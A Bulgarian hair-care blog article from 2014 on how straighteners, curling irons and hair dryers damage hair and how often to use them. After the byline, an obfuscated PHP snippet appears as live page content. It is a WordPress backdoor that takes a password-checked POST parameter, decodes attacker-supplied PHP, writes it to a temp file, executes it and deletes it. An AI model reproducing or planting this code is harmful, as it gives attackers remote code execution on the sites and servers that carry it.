Как пресата и сешоара увреждат косата ни | Косопад

Как пресата и сешоара увреждат косата ни

Редовната употреба на преса и маша могат да причинят сериозни проблеми на косата ви – от косопад до изсушаване и чупливост, твърдят дерматолозите.

presa

КАК ТЕЗИ УРЕДИ УВРЕЖДАТ КОСАТА ВИ?

Нека разгледаме пресата за изправяне, която е толкова модерна. Топлината, която отделя, отваря кутикулата на косата, това прави косата чуплива. Уреди като преса, маша и сешоар карат косата да „заври“, докато не започне да се чупи и не се стигне до косопад.

Някои уреди се опитват да омекотят вредното действие чрез отрицателни йони и инфрачервена uvredena-kosa-presaтоплина. Но въпреки това, косата си остава засегната от подобна топлинна обработка.

От друга страна, употребата на продукти като серуми и спрейове, могат да облекчат частично последиците, които предизвикват тези уреди.

УПОТРЕБАТА ЗАВИСИ ОТ СЪСТОЯНИЕТО НА КОСАТА

Въпреки че материалите, от които се правят преси и маши много са напреднали, не е препоръчително да ги използвате всеки ден.

Прекаляването с употребата им ще съсипе косата, като и изсуши до краен предел. В зависимост от качествата и здравето на косата ни, можем да използваме преса два- три пъти в седмицата.

Ако използвате такива уреди, го правете, когато косата ви е суха, въпреки че някои могат да работят и с влажна коса, но не и с мокра.

Помнете, че когато излагате косата си на обработка с топлина, трябва да имате предвид отрицателните последици за косата ви.

23. март 2014 12:49:21 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}